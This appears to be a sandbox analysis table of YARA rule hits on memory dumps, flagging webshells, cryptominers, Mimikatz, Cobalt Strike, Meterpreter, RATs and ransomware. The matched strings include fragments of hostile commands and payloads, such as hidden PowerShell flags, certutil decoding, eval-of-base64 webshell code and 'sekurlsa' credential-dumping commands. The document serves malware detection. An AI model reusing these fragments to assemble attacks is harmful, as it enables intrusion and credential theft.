00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	MirageStrings	Mirage Identifying Strings	Seth Hardy	0xf7cb:$: Neo,welcome to the desert of real.
00000026.00000003.18409582995.00000138BD8C1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2e9c9:$payload4: eval(gzuncompress(base64_decode 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x240b3:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000026.00000003.18409582995.00000138BD8C1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x7e27:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x7e37:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x854d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x857d:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x858d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x8af7:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x8b07:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000026.00000003.18409582995.00000138BD8C1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x64ce:$new_php2: <?php 0x6ef0:$new_php2: <?php 0x64d3:$dynamic1: $_system($ 0x5d6d:$gen_bit_sus47: Shell 0x13446:$gen_bit_sus47: Shell 0x13470:$gen_bit_sus47: Shell 0x1349a:$gen_bit_sus47: Shell 0x134cc:$gen_bit_sus47: Shell 0x1350c:$gen_bit_sus47: Shell 0x13550:$gen_bit_sus47: Shell 0x17420:$gen_bit_sus47: Shell 0x1773e:$gen_bit_sus47: Shell 0x19785:$gen_bit_sus47: Shell 0x19a78:$gen_bit_sus47: Shell 0x1a0d2:$gen_bit_sus47: Shell 0x15cd3:$gen_bit_sus50: bypass 0x48ad:$gen_bit_sus61: /bin/sh 0x5d1d:$gen_much_sus8: Webshell 0x6259:$gen_much_sus8: webshell 0x6b7b:$gen_much_sus8: WebShell 0x6edb:$gen_much_sus8: WebShell
00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18332072554.00000138BE522000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1431b:$s1: stratum+tcp:// 0x2f54e:$s1: stratum+tcp://
00000026.00000003.18332072554.00000138BE522000.00000004.00000001.sdmp	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
00000026.00000003.18341553900.00000138BCF14000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18341553900.00000138BCF14000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000026.00000003.18341553900.00000138BCF14000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x2f87c:$: odhyrfjcnfkdtslt
00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x164e:$payload7: eval(base64_decode( 0x1639:$php_short: <? 0x24ad:$php_short: <? 0x22817:$php_short: <? 0x1639:$php_new2: <?php 0x24ad:$php_new2: <?php
00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1704:$s1: stratum+tcp://
00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x2b383:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x2bb8e:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x2bb9e:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x181d0:$s2: sekurlsa::wdigest 0x18101:$s6: sekurlsa::livessp 0x18146:$s9: sekurlsa::process 0x1818b:$s12: sekurlsa::tickets 0x180bc:$s15: sekurlsa::credman
00000026.00000003.18346478440.00000138BD16D000.00000004.00000001.sdmp	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0xb98f:$a: Cookies: Sym1.0 0xb930:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x62bf:$s1: stratum+tcp://
00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0x1dd5b:$substring: AAAAYInlM 0x1dd57:$pattern1: /OiCAAAAYInlM
00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0x2b2f9:$x4: reflective_inject_dll 0x2b2f9:$x8: reflective_inject_dll 0x2b2f9:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x22468:$payload7: eval(base64_decode( 0x22492:$payload7: eval(base64_decode( 0x22463:$php_short: <? 0x2248c:$php_short: <? 0x27010:$php_short: <? 0x39589:$php_short: <? 0x22463:$php_new2: <?php 0x2248c:$php_new2: <?php
00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	JoeSecurity_Meterpreter	Yara detected Meterpreter	Joe Security
00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	JoeSecurity_RevengeRAT	Yara detected RevengeRAT	Joe Security
00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	JoeSecurity_EvilGnomeRC5Key	Yara detected Linux EvilGnome RC5 key	unknown
00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x2f7f7:$x1: 78 34 4E 54 64 63 65 44 55 7A 58 48 67 0x2f807:$x1: 78 34 4E 7A 4A 63 65 44 59 35 58 48 67
00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18354111280.00000138BE522000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1431b:$s1: stratum+tcp:// 0x2f54e:$s1: stratum+tcp://
00000026.00000003.18354111280.00000138BE522000.00000004.00000001.sdmp	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x18011:$s1: stratum+tcp:// 0x21c9f:$s1: stratum+tcp://
00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	WScriptShell_Case_Anomaly	Detects obfuscated wscript.shell commands	Florian Roth	0x2818a:$s1: WscRipt.sHeLl").Run
00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	vanquish_2	Webshells Auto-generated - file vanquish.exe	Yara Bulk Rule Generator by Florian Roth	0x4969:$s2: Vanquish - DLL injection failed:
00000026.00000003.18342492638.00000138BE45C000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x20e11:$opbs73: eval(str_rot13( 0x13334:$php_short: <? 0x236eb:$php_short: <? 0x2a5b5:$php_short: <? 0x3b5b7:$php_short: <? 0x3bb07:$php_short: <? 0x3fc26:$php_short: <? 0x2a5b5:$php_new1: <?=$
00000026.00000003.18342492638.00000138BE45C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18328143856.00000138BDCA0000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x8d3e:$opbs48: se'.(32*2) 0x443c:$php_short: <? 0x977f:$php_short: <? 0x977f:$php_new2: <?php
00000026.00000003.18328143856.00000138BDCA0000.00000004.00000001.sdmp	webshell_asp_obfuscated	ASP webshell obfuscated	Arnim Rupp	0x8841:$asp_obf2: u"+"n"+"s 0x8b7a:$tagasp_short1: <%e 0x8b91:$tagasp_short2: %> 0x8b7a:$tagasp_long12: <%ex 0x8182:$tagasp_long20: <scriptlanguage="vb 0x981c:$asp_payload2: eval( 0x8264:$asp_payload8: execute( 0x82ae:$asp_payload8: execute( 0x8b2f:$asp_payload8: execute( 0x98b7:$asp_multi_payload_one3: .run 0xa719:$asp_multi_payload_one3: .run 0xbaba:$asp_multi_payload_one3: .run 0x4740:$asp_multi_payload_three2: Process
00000026.00000003.18328143856.00000138BDCA0000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0xa369:$asp_much_sus8: Webshell 0xbfcd:$asp_much_sus8: Webshell 0x8841:$asp_much_sus39: u"+"n"+"s 0x8b8b:$asp_gen_sus10: "cmd" 0x9740:$asp_gen_sus12: %comspec% 0x8102:$asp_gen_obf1: "+" 0x859e:$asp_gen_obf1: "+" 0x85e9:$asp_gen_obf1: "+" 0x85f4:$asp_gen_obf1: "+" 0x85ff:$asp_gen_obf1: "+" 0x8634:$asp_gen_obf1: "+" 0x863f:$asp_gen_obf1: "+" 0x864a:$asp_gen_obf1: "+" 0x867f:$asp_gen_obf1: "+" 0x868a:$asp_gen_obf1: "+" 0x8695:$asp_gen_obf1: "+" 0x86ca:$asp_gen_obf1: "+" 0x86d5:$asp_gen_obf1: "+" 0x86e0:$asp_gen_obf1: "+" 0x8715:$asp_gen_obf1: "+" 0x8720:$asp_gen_obf1: "+"
00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x25eda:$payload_and_input1: eval(request. 0x25ec1:$tagasp_short1: <%@ 0x25ed8:$tagasp_short1: <%e 0x3dc5b:$tagasp_short1: <%s 0x86a7:$tagasp_short2: %> 0x25ed6:$tagasp_short2: %> 0x25f00:$tagasp_short2: %> 0x25ae1:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8 0x25ed8:$tagasp_long13: <%ev
00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1c1ea:$s05: fce8890000006089e531d2648b52308b
00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp	webshell_php_obfuscated_encoding	PHP webshell obfuscated by encoding	Arnim Rupp	0x5d58:$enc_eval1: \x65\x76\x61\x6c\x28 0x5d58:$enc_eval2: \x65\x76\x61\x6c\x28 0x49ce:$php_short: <? 0x4a59:$php_short: <? 0x4ae4:$php_short: <? 0x7ebe:$php_short: <? 0x156b6:$php_short: <? 0x2cda1:$php_short: <? 0x302ca:$php_short: <? 0x312ff:$php_short: <? 0x32aa7:$php_short: <? 0x36243:$php_short: <? 0x32aa7:$php_new2: <?php
00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x32aa7:$new_php2: <?php 0x323b2:$dynamic3: $_server[base64_decode(' 0x4e2c:$gen_bit_sus11: "cmd.exe 0x4eb8:$gen_bit_sus11: "cmd.exe 0x4fcf:$gen_bit_sus11: "cmd.exe 0x7dab:$gen_bit_sus11: "cmd.exe 0x1ed35:$gen_bit_sus47: Shell 0x2a9c3:$gen_bit_sus47: Shell 0x929d:$gen_bit_sus50: bypass 0x3220e:$gen_bit_sus50: bypass 0x32448:$gen_bit_sus59: 'cmd' 0x1dae3:$gen_bit_sus60: "execute" 0x1db1a:$gen_bit_sus60: "execute" 0x1c0ec:$gen_bit_sus62: Cyber 0x1c18c:$gen_bit_sus62: Cyber 0x30c3a:$gen_bit_sus69: $cmd 0x619e:$gen_much_sus8: Webshell 0x25860:$gen_much_sus8: Webshell 0x31279:$gen_much_sus8: WebShell 0x31515:$gen_much_sus8: Webshell 0x323f9:$gen_much_sus8: Webshell
00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x5d58:$opbs77: \x65\x76\x61\x6c\x28 0x49ce:$php_short: <? 0x4a59:$php_short: <? 0x4ae4:$php_short: <? 0x7ebe:$php_short: <? 0x156b6:$php_short: <? 0x2cda1:$php_short: <? 0x302ca:$php_short: <? 0x312ff:$php_short: <? 0x32aa7:$php_short: <? 0x36243:$php_short: <? 0x32aa7:$php_new2: <?php
00000026.00000003.18319503784.00000138BE66C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18339341305.00000138BE774000.00000004.00000001.sdmp	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x1d676:$pdb1: \ADPassHunt\ 0x1d687:$pdb2: \ADPassHunt.pdb 0x1d69b:$s1: Usage: .\ADPassHunt.exe 0x1d6b7:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x1d6f7:$s3: [ADA] Searching for accounts with userpassword attribute 0x1d734:$s4: [GPP] Searching for passwords now
00000026.00000003.18339341305.00000138BE774000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000026.00000003.18418142617.00000138BD8C1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2e9c9:$payload4: eval(gzuncompress(base64_decode 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x240b3:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000026.00000003.18418142617.00000138BD8C1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x7e27:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x7e37:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x854d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x857d:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x858d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x8af7:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x8b07:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000026.00000003.18418142617.00000138BD8C1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x337d3:$s1: stratum+tcp://
00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x1c841:$payload_and_input1: eval(request[ 0x133f4:$tagasp_short1: <%\xEF 0x1fd76:$tagasp_short1: <%@ 0x1fd9b:$tagasp_short1: <%v 0x1fd99:$tagasp_short2: %> 0x2a7a9:$tagasp_short2: %> 0x316c3:$tagasp_short2: %> 0x36f04:$tagasp_short2: %> 0x3c8a5:$tagasp_short2: %> 0x1fd76:$tagasp_long20: <%@pagelanguage="jscript
00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1c64d:$s1: stratum+tcp://
00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	APT_DeputyDog_Fexel	unknown	ThreatConnect Intelligence Research Team	0x7a08:$cUp: Upload failed! [Remote error code:
00000026.00000003.18323286323.00000138BCB04000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x32be1:$s1: stratum+tcp:// 0x32c21:$s1: stratum+tcp://
00000026.00000003.18323286323.00000138BCB04000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x16d3b:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x16f4b:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x16d3b:$c1: Elevation:Administrator!new: 0x16f4b:$c1: Elevation:Administrator!new: 0x16ce2:$c6: ConsentPromptBehaviorAdmin 0x16ef2:$c6: ConsentPromptBehaviorAdmin
00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x193eb:$a1: certutil -decode
00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000026.00000003.18330244639.00000138BD776000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xf8b6:$s1: stratum+tcp://
00000026.00000003.18330244639.00000138BD776000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18306268361.00000138BCF14000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18306268361.00000138BCF14000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000026.00000003.18306268361.00000138BCF14000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x9be1:$payload_and_input1: eval(request[ 0x8d21:$payload_and_input2: execute(request( 0x10c35:$tagasp_short1: <%: 0x16fe7:$tagasp_short1: <%\xC2 0x165ba:$tagasp_short2: %> 0x28924:$tagasp_short2: %> 0x2e160:$tagasp_short2: %> 0x76d0:$tagasp_long20: <scripttype="text/vbscript"language="vb 0xa702:$jsp4: public 0x38101:$jsp4: public 0x3811a:$jsp4: public
00000026.00000003.18290586958.00000138BE774000.00000004.00000001.sdmp	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x1d676:$pdb1: \ADPassHunt\ 0x1d687:$pdb2: \ADPassHunt.pdb 0x1d69b:$s1: Usage: .\ADPassHunt.exe 0x1d6b7:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x1d6f7:$s3: [ADA] Searching for accounts with userpassword attribute 0x1d734:$s4: [GPP] Searching for passwords now
00000026.00000003.18290586958.00000138BE774000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000026.00000003.18353734046.00000138BDA90000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x337d3:$s1: stratum+tcp://
00000026.00000003.18353734046.00000138BDA90000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18300303304.00000138BE24D000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000026.00000003.18350554191.00000138BE7D2000.00000004.00000001.sdmp	Msfpayloads_msf_psh	Metasploit Payloads - file msf-psh.vba	Florian Roth	0x175f4:$s1: powershell.exe -nop -w hidden -e 0x1645a:$s2: Call Shell( 0x177e4:$s3: Sub Workbook_Open()
00000026.00000003.18300875514.00000138BE2D0000.00000004.00000001.sdmp	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0x2ec46:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0x2eb23:$rat2: rat.(Core).generateBeacon 0x2eb40:$rat3: rat.gJitter 0x2eb4e:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0x2ebb4:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0x2ec1c:$rat8: rat/modules/netsweeper.(Pinger).listen 0x2ec46:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0x2ec74:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0x2eafa:$winblows: rat/platforms/win.(winblows).GetStage
00000026.00000003.18300587499.00000138BE28E000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18348013322.00000138BE8D4000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2dd0c:$s1: stratum+tcp://
00000026.00000003.18348013322.00000138BE8D4000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18348013322.00000138BE8D4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18291761539.00000138BCE4E000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18314653568.00000138BCAC3000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x244bd:$s4: sekurlsa::kerberos
00000026.00000003.18289807011.00000138BEB27000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1e6ab:$s1: stratum+tcp://
00000026.00000003.18289807011.00000138BEB27000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18289807011.00000138BEB27000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp	Trojan_Win32_PlaKeylog_B	Keylogger component	Microsoft	0x322fd:$hook: C6 06 FF 46 C6 06 25 0x32308:$dasm_engine: 80 C9 10 88 0E 8A CA 80 E1 07 43 88 56 03 80 F9 05
00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp	DeepPanda_htran_exe	Hack Deep Panda - htran-exe	Florian Roth	0x34768:$s15: [+] OK! I Closed The Two Socket.
00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18305388995.00000138BD315000.00000004.00000001.sdmp	clearlog	Detects Fireball malware - file clearlog.dll	Florian Roth	0x10817:$s3: hhhhh.exe 0x10801:$s4: ttttt.exe 0x107eb:$s6: cle.log.1
00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x20a4c:$s1: stratum+tcp://
00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x29e92:$sb1: -w hidden 0x29e9c:$sc1: -nop 0x29ea1:$se1: -ep bypass 0x1fda9:$se3: -ExecutionPolicy Bypass
00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xfeb8:$s1: stratum+tcp://
00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	JoeSecurity_Cute	Yara detected Cute Ransomware	Joe Security
00000026.00000003.18305060553.00000138BDA90000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x337d3:$s1: stratum+tcp://
00000026.00000003.18305060553.00000138BDA90000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18317087585.00000138BCA04000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18418975958.00000138BD8C1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2e9c9:$payload4: eval(gzuncompress(base64_decode 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x240b3:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000026.00000003.18418975958.00000138BD8C1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x7e27:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x7e37:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x854d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x857d:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x858d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x8af7:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x8b07:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000026.00000003.18418975958.00000138BD8C1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18320434515.00000138BD905000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18301189769.00000138BE6F1000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
